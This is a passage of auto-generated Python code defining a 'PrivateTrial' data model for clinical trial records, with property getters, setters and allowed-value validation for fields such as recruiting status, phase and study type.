'enrollment': 'enrollment',
'condition': 'condition',
'arm_group': 'arm_group',
'intervention': 'intervention',
'biospec_retention': 'biospec_retention',
'biospec_descr': 'biospec_descr',
'eligibility': 'eligibility',
'overall_official': 'overall_official',
'overall_contact': 'overall_contact',
'overall_contact_backup': 'overall_contact_backup',
'location': 'location',
'location_countries': 'location_countries',
'link': 'link',
'reference': 'reference',
'verification_date': 'verification_date',
'study_first_submitted': 'study_first_submitted',
'study_first_posted': 'study_first_posted',
'last_update_posted': 'last_update_posted',
'keyword': 'keyword',
'responsible_party': 'responsible_party',
'processing_status': 'processing_status',
'test': 'test'
}
def __init__(self, id=None, institution_id=None, institution_study_id=None, registry_id=None, visible_to_idn=True, brief_title=None, acronym=None, official_title=None, sponsors=None, source=None, oversight=None, brief_summary=None, detailed_description=None, status=None, start_date=None, completion_date=None, phase='N/A', study_type=None, has_expanded_access=None, expanded_access=None, study_design=None, primary_outcome=None, secondary_outcome=None, other_outcome=None, number_of_arms=1, number_of_groups=1, enrollment=None, condition=None, arm_group=None, intervention=None, biospec_retention='None Retained', biospec_descr=None, eligibility=None, overall_official=None, overall_contact=None, overall_contact_backup=None, location=None, location_countries=None, link=None, reference=None, verification_date=None, study_first_submitted=None, study_first_posted=None, last_update_posted=None, keyword=None, responsible_party=None, processing_status='received', test=None): # noqa: E501
"""PrivateTrial - a model defined in Swagger""" # noqa: E501
self._id = None
self._institution_id = None
self._institution_study_id = None
self._registry_id = None
self._visible_to_idn = None
self._brief_title = None
self._acronym = None
self._official_title = None
self._sponsors = None
self._source = None
self._oversight = None
self._brief_summary = None
self._detailed_description = None
self._status = None
self._start_date = None
self._completion_date = None
self._phase = None
self._study_type = None
self._has_expanded_access = None
self._expanded_access = None
self._study_design = None
self._primary_outcome = None
self._secondary_outcome = None
self._other_outcome = None
self._number_of_arms = None
self._number_of_groups = None
self._enrollment = None
self._condition = None
self._arm_group = None
self._intervention = None
self._biospec_retention = None
self._biospec_descr = None
self._eligibility = None
self._overall_official = None
self._overall_contact = None
self._overall_contact_backup = None
self._location = None
self._location_countries = None
self._link = None
self._reference = None
self._verification_date = None
self._study_first_submitted = None
self._study_first_posted = None
self._last_update_posted = None
self._keyword = None
self._responsible_party = None
self._processing_status = None
self._test = None
self.discriminator = None
if id is not None:
self.id = id
self.institution_id = institution_id
self.institution_study_id = institution_study_id
if registry_id is not None:
self.registry_id = registry_id
if visible_to_idn is not None:
self.visible_to_idn = visible_to_idn
if brief_title is not None:
self.brief_title = brief_title
if acronym is not None:
self.acronym = acronym
self.official_title = official_title
if sponsors is not None:
self.sponsors = sponsors
if source is not None:
self.source = source
if oversight is not None:
self.oversight = oversight
if brief_summary is not None:
self.brief_summary = brief_summary
if detailed_description is not None:
self.detailed_description = detailed_description
self.status = status
self.start_date = start_date
if completion_date is not None:
self.completion_date = completion_date
if phase is not None:
self.phase = phase
self.study_type = study_type
if has_expanded_access is not None:
self.has_expanded_access = has_expanded_access
if expanded_access is not None:
self.expanded_access = expanded_access
if study_design is not None:
self.study_design = study_design
if primary_outcome is not None:
self.primary_outcome = primary_outcome
if secondary_outcome is not None:
self.secondary_outcome = secondary_outcome
if other_outcome is not None:
self.other_outcome = other_outcome
if number_of_arms is not None:
self.number_of_arms = number_of_arms
if number_of_groups is not None:
self.number_of_groups = number_of_groups
if enrollment is not None:
self.enrollment = enrollment
if condition is not None:
self.condition = condition
if arm_group is not None:
self.arm_group = arm_group
if intervention is not None:
self.intervention = intervention
if biospec_retention is not None:
self.biospec_retention = biospec_retention
if biospec_descr is not None:
self.biospec_descr = biospec_descr
if eligibility is not None:
self.eligibility = eligibility
if overall_official is not None:
self.overall_official = overall_official
if overall_contact is not None:
self.overall_contact = overall_contact
if overall_contact_backup is not None:
self.overall_contact_backup = overall_contact_backup
self.location = location
if location_countries is not None:
self.location_countries = location_countries
if link is not None:
self.link = link
if reference is not None:
self.reference = reference
if verification_date is not None:
self.verification_date = verification_date
if study_first_submitted is not None:
self.study_first_submitted = study_first_submitted
if study_first_posted is not None:
self.study_first_posted = study_first_posted
if last_update_posted is not None:
self.last_update_posted = last_update_posted
if keyword is not None:
self.keyword = keyword
if responsible_party is not None:
self.responsible_party = responsible_party
if processing_status is not None:
self.processing_status = processing_status
if test is not None:
self.test = test
@property
def id(self):
"""Gets the id of this PrivateTrial. # noqa: E501
unique study identifier. # noqa: E501
:return: The id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PrivateTrial.
unique study identifier. # noqa: E501
:param id: The id of this PrivateTrial. # noqa: E501
:type: str
"""
self._id = id
@property
def institution_id(self):
"""Gets the institution_id of this PrivateTrial. # noqa: E501
Unique institution identifier. # noqa: E501
:return: The institution_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._institution_id
@institution_id.setter
def institution_id(self, institution_id):
"""Sets the institution_id of this PrivateTrial.
Unique institution identifier. # noqa: E501
:param institution_id: The institution_id of this PrivateTrial. # noqa: E501
:type: str
"""
if institution_id is None:
raise ValueError("Invalid value for `institution_id`, must not be `None`") # noqa: E501
self._institution_id = institution_id
@property
def institution_study_id(self):
"""Gets the institution_study_id of this PrivateTrial. # noqa: E501
Unique study identifier (for the institution). # noqa: E501
:return: The institution_study_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._institution_study_id
@institution_study_id.setter
def institution_study_id(self, institution_study_id):
"""Sets the institution_study_id of this PrivateTrial.
Unique study identifier (for the institution). # noqa: E501
:param institution_study_id: The institution_study_id of this PrivateTrial. # noqa: E501
:type: str
"""
if institution_study_id is None:
raise ValueError("Invalid value for `institution_study_id`, must not be `None`") # noqa: E501
self._institution_study_id = institution_study_id
@property
def registry_id(self):
"""Gets the registry_id of this PrivateTrial. # noqa: E501
The public registry study id. This is only populated once the trial is no longer a private trial. # noqa: E501
:return: The registry_id of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._registry_id
@registry_id.setter
def registry_id(self, registry_id):
"""Sets the registry_id of this PrivateTrial.
The public registry study id. This is only populated once the trial is no longer a private trial. # noqa: E501
:param registry_id: The registry_id of this PrivateTrial. # noqa: E501
:type: str
"""
self._registry_id = registry_id
@property
def visible_to_idn(self):
"""Gets the visible_to_idn of this PrivateTrial. # noqa: E501
If true, then this trial will be visible to the entire IDN, else it is visible only to the owning institution. # noqa: E501
:return: The visible_to_idn of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._visible_to_idn
@visible_to_idn.setter
def visible_to_idn(self, visible_to_idn):
"""Sets the visible_to_idn of this PrivateTrial.
If true, then this trial will be visible to the entire IDN, else it is visible only to the owning institution. # noqa: E501
:param visible_to_idn: The visible_to_idn of this PrivateTrial. # noqa: E501
:type: bool
"""
self._visible_to_idn = visible_to_idn
@property
def brief_title(self):
"""Gets the brief_title of this PrivateTrial. # noqa: E501
A short title of the clinical study written in language intended for the lay public. The title should include, where possible, information on the participants, condition being evaluated, and intervention(s) studied. # noqa: E501
:return: The brief_title of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._brief_title
@brief_title.setter
def brief_title(self, brief_title):
"""Sets the brief_title of this PrivateTrial.
A short title of the clinical study written in language intended for the lay public. The title should include, where possible, information on the participants, condition being evaluated, and intervention(s) studied. # noqa: E501
:param brief_title: The brief_title of this PrivateTrial. # noqa: E501
:type: str
"""
self._brief_title = brief_title
@property
def acronym(self):
"""Gets the acronym of this PrivateTrial. # noqa: E501
Acronyms or abbreviations used publicly to identify the clinical study. # noqa: E501
:return: The acronym of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._acronym
@acronym.setter
def acronym(self, acronym):
"""Sets the acronym of this PrivateTrial.
Acronyms or abbreviations used publicly to identify the clinical study. # noqa: E501
:param acronym: The acronym of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._acronym = acronym
@property
def official_title(self):
"""Gets the official_title of this PrivateTrial. # noqa: E501
Official title for the clinical trial. # noqa: E501
:return: The official_title of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._official_title
@official_title.setter
def official_title(self, official_title):
"""Sets the official_title of this PrivateTrial.
Official title for the clinical trial. # noqa: E501
:param official_title: The official_title of this PrivateTrial. # noqa: E501
:type: str
"""
if official_title is None:
raise ValueError("Invalid value for `official_title`, must not be `None`") # noqa: E501
self._official_title = official_title
@property
def sponsors(self):
"""Gets the sponsors of this PrivateTrial. # noqa: E501
The list of organizations or persons who initiated the study and who have authority and control over the study. # noqa: E501
:return: The sponsors of this PrivateTrial. # noqa: E501
:rtype: list[ClinicalTrialSponsors]
"""
return self._sponsors
@sponsors.setter
def sponsors(self, sponsors):
"""Sets the sponsors of this PrivateTrial.
The list of organizations or persons who initiated the study and who have authority and control over the study. # noqa: E501
:param sponsors: The sponsors of this PrivateTrial. # noqa: E501
:type: list[ClinicalTrialSponsors]
"""
self._sponsors = sponsors
@property
def source(self):
"""Gets the source of this PrivateTrial. # noqa: E501
Native data source of this record # noqa: E501
:return: The source of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this PrivateTrial.
Native data source of this record # noqa: E501
:param source: The source of this PrivateTrial. # noqa: E501
:type: str
"""
self._source = source
@property
def oversight(self):
"""Gets the oversight of this PrivateTrial. # noqa: E501
:return: The oversight of this PrivateTrial. # noqa: E501
:rtype: Oversight
"""
return self._oversight
@oversight.setter
def oversight(self, oversight):
"""Sets the oversight of this PrivateTrial.
:param oversight: The oversight of this PrivateTrial. # noqa: E501
:type: Oversight
"""
self._oversight = oversight
@property
def brief_summary(self):
"""Gets the brief_summary of this PrivateTrial. # noqa: E501
A short description of the clinical study, including a brief statement of the clinical study's hypothesis, written in language intended for the lay public. # noqa: E501
:return: The brief_summary of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._brief_summary
@brief_summary.setter
def brief_summary(self, brief_summary):
"""Sets the brief_summary of this PrivateTrial.
A short description of the clinical study, including a brief statement of the clinical study's hypothesis, written in language intended for the lay public. # noqa: E501
:param brief_summary: The brief_summary of this PrivateTrial. # noqa: E501
:type: str
"""
self._brief_summary = brief_summary
@property
def detailed_description(self):
"""Gets the detailed_description of this PrivateTrial. # noqa: E501
Extended description of the protocol, including more technical information (as compared to the Brief Summary), if desired. Do not include the entire protocol; do not duplicate information recorded in other data elements, such as Eligibility Criteria or outcome measures. # noqa: E501
:return: The detailed_description of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._detailed_description
@detailed_description.setter
def detailed_description(self, detailed_description):
"""Sets the detailed_description of this PrivateTrial.
Extended description of the protocol, including more technical information (as compared to the Brief Summary), if desired. Do not include the entire protocol; do not duplicate information recorded in other data elements, such as Eligibility Criteria or outcome measures. # noqa: E501
:param detailed_description: The detailed_description of this PrivateTrial. # noqa: E501
:type: str
"""
self._detailed_description = detailed_description
@property
def status(self):
"""Gets the status of this PrivateTrial. # noqa: E501
Trial recruiting status. # noqa: E501
:return: The status of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this PrivateTrial.
Trial recruiting status. # noqa: E501
:param status: The status of this PrivateTrial. # noqa: E501
:type: str
"""
if status is None:
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
allowed_values = ["Active, not recruiting", "Approved for marketing", "Available", "Completed", "Enrolling by invitation", "No longer available", "Not yet recruiting", "Recruiting", "Suspended", "Temporarily not available", "Terminated", "Withdrawn", "Withheld", "Unknown status"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def start_date(self):
"""Gets the start_date of this PrivateTrial. # noqa: E501
The estimated date on which the clinical study will be open for recruitment of participants, or the actual date on which the first participant was enrolled. # noqa: E501
:return: The start_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this PrivateTrial.
The estimated date on which the clinical study will be open for recruitment of participants, or the actual date on which the first participant was enrolled. # noqa: E501
:param start_date: The start_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
if start_date is None:
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def completion_date(self):
"""Gets the completion_date of this PrivateTrial. # noqa: E501
The date the final participant was examined or received an intervention for purposes of final collection of data for the primary and secondary outcome measures and adverse events (for example, last participant’s last visit), whether the clinical study concluded according to the pre-specified protocol or was terminated # noqa: E501
:return: The completion_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._completion_date
@completion_date.setter
def completion_date(self, completion_date):
"""Sets the completion_date of this PrivateTrial.
The date the final participant was examined or received an intervention for purposes of final collection of data for the primary and secondary outcome measures and adverse events (for example, last participant’s last visit), whether the clinical study concluded according to the pre-specified protocol or was terminated # noqa: E501
:param completion_date: The completion_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._completion_date = completion_date
@property
def phase(self):
"""Gets the phase of this PrivateTrial. # noqa: E501
For a clinical trial of a drug product (including a biological product), the numerical phase of such clinical trial, consistent with terminology in 21 CFR 312.21 and in 21 CFR 312.85 for phase 4 studies. # noqa: E501
:return: The phase of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._phase
@phase.setter
def phase(self, phase):
"""Sets the phase of this PrivateTrial.
For a clinical trial of a drug product (including a biological product), the numerical phase of such clinical trial, consistent with terminology in 21 CFR 312.21 and in 21 CFR 312.85 for phase 4 studies. # noqa: E501
:param phase: The phase of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["N/A", "Early Phase 1", "Phase 1", "Phase 1/Phase 2", "Phase 2", "Phase 2/Phase 3", "Phase 3", "Phase 4"] # noqa: E501
if phase not in allowed_values:
raise ValueError(
"Invalid value for `phase` ({0}), must be one of {1}" # noqa: E501
.format(phase, allowed_values)
)
self._phase = phase
@property
def study_type(self):
"""Gets the study_type of this PrivateTrial. # noqa: E501
The nature of the investigation or investigational use for which clinical study information is being submitted. # noqa: E501
:return: The study_type of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._study_type
@study_type.setter
def study_type(self, study_type):
"""Sets the study_type of this PrivateTrial.
The nature of the investigation or investigational use for which clinical study information is being submitted. # noqa: E501
:param study_type: The study_type of this PrivateTrial. # noqa: E501
:type: str
"""
if study_type is None:
raise ValueError("Invalid value for `study_type`, must not be `None`") # noqa: E501
allowed_values = ["Expanded Access", "Interventional", "N/A", "Observational", "Observational [Patient Registry]"] # noqa: E501
if study_type not in allowed_values:
raise ValueError(
"Invalid value for `study_type` ({0}), must be one of {1}" # noqa: E501
.format(study_type, allowed_values)
)
self._study_type = study_type
@property
def has_expanded_access(self):
"""Gets the has_expanded_access of this PrivateTrial. # noqa: E501
Whether there is expanded access to the investigational product for patients who do not qualify for enrollment in a clinical trial. Expanded Access for investigational drug products (including biological products) includes all expanded access types under section 561 of the Federal Food, Drug, and Cosmetic Act: (1) for individual participants, including emergency use; (2) for intermediate-size participant populations; and (3) under a treatment IND or treatment protocol. # noqa: E501
:return: The has_expanded_access of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._has_expanded_access
@has_expanded_access.setter
def has_expanded_access(self, has_expanded_access):
"""Sets the has_expanded_access of this PrivateTrial.
Whether there is expanded access to the investigational product for patients who do not qualify for enrollment in a clinical trial. Expanded Access for investigational drug products (including biological products) includes all expanded access types under section 561 of the Federal Food, Drug, and Cosmetic Act: (1) for individual participants, including emergency use; (2) for intermediate-size participant populations; and (3) under a treatment IND or treatment protocol. # noqa: E501
:param has_expanded_access: The has_expanded_access of this PrivateTrial. # noqa: E501
:type: bool
"""
self._has_expanded_access = has_expanded_access
@property
def expanded_access(self):
"""Gets the expanded_access of this PrivateTrial. # noqa: E501
:return: The expanded_access of this PrivateTrial. # noqa: E501
:rtype: ExpandedAccess
"""
return self._expanded_access
@expanded_access.setter
def expanded_access(self, expanded_access):
"""Sets the expanded_access of this PrivateTrial.
:param expanded_access: The expanded_access of this PrivateTrial. # noqa: E501
:type: ExpandedAccess
"""
self._expanded_access = expanded_access
@property
def study_design(self):
"""Gets the study_design of this PrivateTrial. # noqa: E501
:return: The study_design of this PrivateTrial. # noqa: E501
:rtype: StudyDesign
"""
return self._study_design
@study_design.setter
def study_design(self, study_design):
"""Sets the study_design of this PrivateTrial.
:param study_design: The study_design of this PrivateTrial. # noqa: E501
:type: StudyDesign
"""
self._study_design = study_design
@property
def primary_outcome(self):
"""Gets the primary_outcome of this PrivateTrial. # noqa: E501
The outcome that an investigator considers to be the most important among the many outcomes that are to be examined in the study. # noqa: E501
:return: The primary_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._primary_outcome
@primary_outcome.setter
def primary_outcome(self, primary_outcome):
"""Sets the primary_outcome of this PrivateTrial.
The outcome that an investigator considers to be the most important among the many outcomes that are to be examined in the study. # noqa: E501
:param primary_outcome: The primary_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._primary_outcome = primary_outcome
@property
def secondary_outcome(self):
"""Gets the secondary_outcome of this PrivateTrial. # noqa: E501
:return: The secondary_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._secondary_outcome
@secondary_outcome.setter
def secondary_outcome(self, secondary_outcome):
"""Sets the secondary_outcome of this PrivateTrial.
:param secondary_outcome: The secondary_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._secondary_outcome = secondary_outcome
@property
def other_outcome(self):
"""Gets the other_outcome of this PrivateTrial. # noqa: E501
:return: The other_outcome of this PrivateTrial. # noqa: E501
:rtype: list[Outcome]
"""
return self._other_outcome
@other_outcome.setter
def other_outcome(self, other_outcome):
"""Sets the other_outcome of this PrivateTrial.
:param other_outcome: The other_outcome of this PrivateTrial. # noqa: E501
:type: list[Outcome]
"""
self._other_outcome = other_outcome
@property
def number_of_arms(self):
"""Gets the number_of_arms of this PrivateTrial. # noqa: E501
The number of trial arms. # noqa: E501
:return: The number_of_arms of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._number_of_arms
@number_of_arms.setter
def number_of_arms(self, number_of_arms):
"""Sets the number_of_arms of this PrivateTrial.
The number of trial arms. # noqa: E501
:param number_of_arms: The number_of_arms of this PrivateTrial. # noqa: E501
:type: int
"""
self._number_of_arms = number_of_arms
@property
def number_of_groups(self):
"""Gets the number_of_groups of this PrivateTrial. # noqa: E501
The number of trial groups. # noqa: E501
:return: The number_of_groups of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._number_of_groups
@number_of_groups.setter
def number_of_groups(self, number_of_groups):
"""Sets the number_of_groups of this PrivateTrial.
The number of trial groups. # noqa: E501
:param number_of_groups: The number_of_groups of this PrivateTrial. # noqa: E501
:type: int
"""
self._number_of_groups = number_of_groups
@property
def enrollment(self):
"""Gets the enrollment of this PrivateTrial. # noqa: E501
The estimated total number of participants to be enrolled (target number) or the actual total number of participants that are enrolled in the clinical study. # noqa: E501
:return: The enrollment of this PrivateTrial. # noqa: E501
:rtype: int
"""
return self._enrollment
@enrollment.setter
def enrollment(self, enrollment):
"""Sets the enrollment of this PrivateTrial.
The estimated total number of participants to be enrolled (target number) or the actual total number of participants that are enrolled in the clinical study. # noqa: E501
:param enrollment: The enrollment of this PrivateTrial. # noqa: E501
:type: int
"""
self._enrollment = enrollment
@property
def condition(self):
"""Gets the condition of this PrivateTrial. # noqa: E501
Diseases/Conditions related to this trial. # noqa: E501
:return: The condition of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._condition
@condition.setter
def condition(self, condition):
"""Sets the condition of this PrivateTrial.
Diseases/Conditions related to this trial. # noqa: E501
:param condition: The condition of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._condition = condition
@property
def arm_group(self):
"""Gets the arm_group of this PrivateTrial. # noqa: E501
Pre-specified groups of participants in a clinical trial assigned to receive specific interventions (or no intervention) according to a protocol. # noqa: E501
:return: The arm_group of this PrivateTrial. # noqa: E501
:rtype: list[ArmGroup]
"""
return self._arm_group
@arm_group.setter
def arm_group(self, arm_group):
"""Sets the arm_group of this PrivateTrial.
Pre-specified groups of participants in a clinical trial assigned to receive specific interventions (or no intervention) according to a protocol. # noqa: E501
:param arm_group: The arm_group of this PrivateTrial. # noqa: E501
:type: list[ArmGroup]
"""
self._arm_group = arm_group
@property
def intervention(self):
"""Gets the intervention of this PrivateTrial. # noqa: E501
Specifies the intervention(s) associated with each arm or group. # noqa: E501
:return: The intervention of this PrivateTrial. # noqa: E501
:rtype: list[Intervention]
"""
return self._intervention
@intervention.setter
def intervention(self, intervention):
"""Sets the intervention of this PrivateTrial.
Specifies the intervention(s) associated with each arm or group. # noqa: E501
:param intervention: The intervention of this PrivateTrial. # noqa: E501
:type: list[Intervention]
"""
self._intervention = intervention
@property
def biospec_retention(self):
"""Gets the biospec_retention of this PrivateTrial. # noqa: E501
:return: The biospec_retention of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._biospec_retention
@biospec_retention.setter
def biospec_retention(self, biospec_retention):
"""Sets the biospec_retention of this PrivateTrial.
:param biospec_retention: The biospec_retention of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["None Retained", "Samples With DNA", "Samples Without DNA"] # noqa: E501
if biospec_retention not in allowed_values:
raise ValueError(
"Invalid value for `biospec_retention` ({0}), must be one of {1}" # noqa: E501
.format(biospec_retention, allowed_values)
)
self._biospec_retention = biospec_retention
@property
def biospec_descr(self):
"""Gets the biospec_descr of this PrivateTrial. # noqa: E501
:return: The biospec_descr of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._biospec_descr
@biospec_descr.setter
def biospec_descr(self, biospec_descr):
"""Sets the biospec_descr of this PrivateTrial.
:param biospec_descr: The biospec_descr of this PrivateTrial. # noqa: E501
:type: str
"""
self._biospec_descr = biospec_descr
@property
def eligibility(self):
"""Gets the eligibility of this PrivateTrial. # noqa: E501
:return: The eligibility of this PrivateTrial. # noqa: E501
:rtype: Eligibility
"""
return self._eligibility
@eligibility.setter
def eligibility(self, eligibility):
"""Sets the eligibility of this PrivateTrial.
:param eligibility: The eligibility of this PrivateTrial. # noqa: E501
:type: Eligibility
"""
self._eligibility = eligibility
@property
def overall_official(self):
"""Gets the overall_official of this PrivateTrial. # noqa: E501
Person responsible for the overall scientific leadership of the protocol, including study principal investigator. # noqa: E501
:return: The overall_official of this PrivateTrial. # noqa: E501
:rtype: list[Investigator]
"""
return self._overall_official
@overall_official.setter
def overall_official(self, overall_official):
"""Sets the overall_official of this PrivateTrial.
Person responsible for the overall scientific leadership of the protocol, including study principal investigator. # noqa: E501
:param overall_official: The overall_official of this PrivateTrial. # noqa: E501
:type: list[Investigator]
"""
self._overall_official = overall_official
@property
def overall_contact(self):
"""Gets the overall_contact of this PrivateTrial. # noqa: E501
:return: The overall_contact of this PrivateTrial. # noqa: E501
:rtype: Contact
"""
return self._overall_contact
@overall_contact.setter
def overall_contact(self, overall_contact):
"""Sets the overall_contact of this PrivateTrial.
:param overall_contact: The overall_contact of this PrivateTrial. # noqa: E501
:type: Contact
"""
self._overall_contact = overall_contact
@property
def overall_contact_backup(self):
"""Gets the overall_contact_backup of this PrivateTrial. # noqa: E501
:return: The overall_contact_backup of this PrivateTrial. # noqa: E501
:rtype: Contact
"""
return self._overall_contact_backup
@overall_contact_backup.setter
def overall_contact_backup(self, overall_contact_backup):
"""Sets the overall_contact_backup of this PrivateTrial.
:param overall_contact_backup: The overall_contact_backup of this PrivateTrial. # noqa: E501
:type: Contact
"""
self._overall_contact_backup = overall_contact_backup
@property
def location(self):
"""Gets the location of this PrivateTrial. # noqa: E501
Information about the locations offering this trial. # noqa: E501
:return: The location of this PrivateTrial. # noqa: E501
:rtype: list[Location]
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this PrivateTrial.
Information about the locations offering this trial. # noqa: E501
:param location: The location of this PrivateTrial. # noqa: E501
:type: list[Location]
"""
if location is None:
raise ValueError("Invalid value for `location`, must not be `None`") # noqa: E501
self._location = location
@property
def location_countries(self):
"""Gets the location_countries of this PrivateTrial. # noqa: E501
Countries with locations offering this trial. # noqa: E501
:return: The location_countries of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._location_countries
@location_countries.setter
def location_countries(self, location_countries):
"""Sets the location_countries of this PrivateTrial.
Countries with locations offering this trial. # noqa: E501
:param location_countries: The location_countries of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._location_countries = location_countries
@property
def link(self):
"""Gets the link of this PrivateTrial. # noqa: E501
URL to institution (if private) or registry listing of this trial. # noqa: E501
:return: The link of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._link
@link.setter
def link(self, link):
"""Sets the link of this PrivateTrial.
URL to institution (if private) or registry listing of this trial. # noqa: E501
:param link: The link of this PrivateTrial. # noqa: E501
:type: str
"""
self._link = link
@property
def reference(self):
"""Gets the reference of this PrivateTrial. # noqa: E501
Reference publications pertaining to this trial. # noqa: E501
:return: The reference of this PrivateTrial. # noqa: E501
:rtype: list[Reference]
"""
return self._reference
@reference.setter
def reference(self, reference):
"""Sets the reference of this PrivateTrial.
Reference publications pertaining to this trial. # noqa: E501
:param reference: The reference of this PrivateTrial. # noqa: E501
:type: list[Reference]
"""
self._reference = reference
@property
def verification_date(self):
"""Gets the verification_date of this PrivateTrial. # noqa: E501
The date on which the responsible party last verified the clinical study information in the entire ClinicalTrials.gov record for the clinical study, even if no additional or updated information is being submitted. # noqa: E501
:return: The verification_date of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._verification_date
@verification_date.setter
def verification_date(self, verification_date):
"""Sets the verification_date of this PrivateTrial.
The date on which the responsible party last verified the clinical study information in the entire ClinicalTrials.gov record for the clinical study, even if no additional or updated information is being submitted. # noqa: E501
:param verification_date: The verification_date of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._verification_date = verification_date
@property
def study_first_submitted(self):
"""Gets the study_first_submitted of this PrivateTrial. # noqa: E501
The date on which the study sponsor or investigator first submitted a study record to the trial registry. # noqa: E501
:return: The study_first_submitted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._study_first_submitted
@study_first_submitted.setter
def study_first_submitted(self, study_first_submitted):
"""Sets the study_first_submitted of this PrivateTrial.
The date on which the study sponsor or investigator first submitted a study record to the trial registry. # noqa: E501
:param study_first_submitted: The study_first_submitted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._study_first_submitted = study_first_submitted
@property
def study_first_posted(self):
"""Gets the study_first_posted of this PrivateTrial. # noqa: E501
The date on which the study was first made public on trial registry. # noqa: E501
:return: The study_first_posted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._study_first_posted
@study_first_posted.setter
def study_first_posted(self, study_first_posted):
"""Sets the study_first_posted of this PrivateTrial.
The date on which the study was first made public on trial registry. # noqa: E501
:param study_first_posted: The study_first_posted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._study_first_posted = study_first_posted
@property
def last_update_posted(self):
"""Gets the last_update_posted of this PrivateTrial. # noqa: E501
The most recent date that any information was updated for this trial. # noqa: E501
:return: The last_update_posted of this PrivateTrial. # noqa: E501
:rtype: datetime
"""
return self._last_update_posted
@last_update_posted.setter
def last_update_posted(self, last_update_posted):
"""Sets the last_update_posted of this PrivateTrial.
The most recent date that any information was updated for this trial. # noqa: E501
:param last_update_posted: The last_update_posted of this PrivateTrial. # noqa: E501
:type: datetime
"""
self._last_update_posted = last_update_posted
@property
def keyword(self):
"""Gets the keyword of this PrivateTrial. # noqa: E501
Words or phrases that best describe the protocol. Keywords help users find studies in the database. Use NLM's Medical Subject Heading (MeSH)-controlled vocabulary terms where appropriate. Be as specific and precise as possible. # noqa: E501
:return: The keyword of this PrivateTrial. # noqa: E501
:rtype: list[str]
"""
return self._keyword
@keyword.setter
def keyword(self, keyword):
"""Sets the keyword of this PrivateTrial.
Words or phrases that best describe the protocol. Keywords help users find studies in the database. Use NLM's Medical Subject Heading (MeSH)-controlled vocabulary terms where appropriate. Be as specific and precise as possible. # noqa: E501
:param keyword: The keyword of this PrivateTrial. # noqa: E501
:type: list[str]
"""
self._keyword = keyword
@property
def responsible_party(self):
"""Gets the responsible_party of this PrivateTrial. # noqa: E501
The entities and individuals responsible for this trial. # noqa: E501
:return: The responsible_party of this PrivateTrial. # noqa: E501
:rtype: list[ResponsibleParty]
"""
return self._responsible_party
@responsible_party.setter
def responsible_party(self, responsible_party):
"""Sets the responsible_party of this PrivateTrial.
The entities and individuals responsible for this trial. # noqa: E501
:param responsible_party: The responsible_party of this PrivateTrial. # noqa: E501
:type: list[ResponsibleParty]
"""
self._responsible_party = responsible_party
@property
def processing_status(self):
"""Gets the processing_status of this PrivateTrial. # noqa: E501
Indication of its level of readiness and incorporation into the MolecularMatch Knowledge base. # noqa: E501
:return: The processing_status of this PrivateTrial. # noqa: E501
:rtype: str
"""
return self._processing_status
@processing_status.setter
def processing_status(self, processing_status):
"""Sets the processing_status of this PrivateTrial.
Indication of its level of readiness and incorporation into the MolecularMatch Knowledge base. # noqa: E501
:param processing_status: The processing_status of this PrivateTrial. # noqa: E501
:type: str
"""
allowed_values = ["received", "in-process", "registered"] # noqa: E501
if processing_status not in allowed_values:
raise ValueError(
"Invalid value for `processing_status` ({0}), must be one of {1}" # noqa: E501
.format(processing_status, allowed_values)
)
self._processing_status = processing_status
@property
def test(self):
"""Gets the test of this PrivateTrial. # noqa: E501
A flag to mark test private trials. # noqa: E501
:return: The test of this PrivateTrial. # noqa: E501
:rtype: bool
"""
return self._test
@test.setter
def test(self, test):
"""Sets the test of this PrivateTrial.
A flag to mark test private trials. # noqa: E501
:param test: The test of this PrivateTrial. # noqa: E501
:type: bool
"""
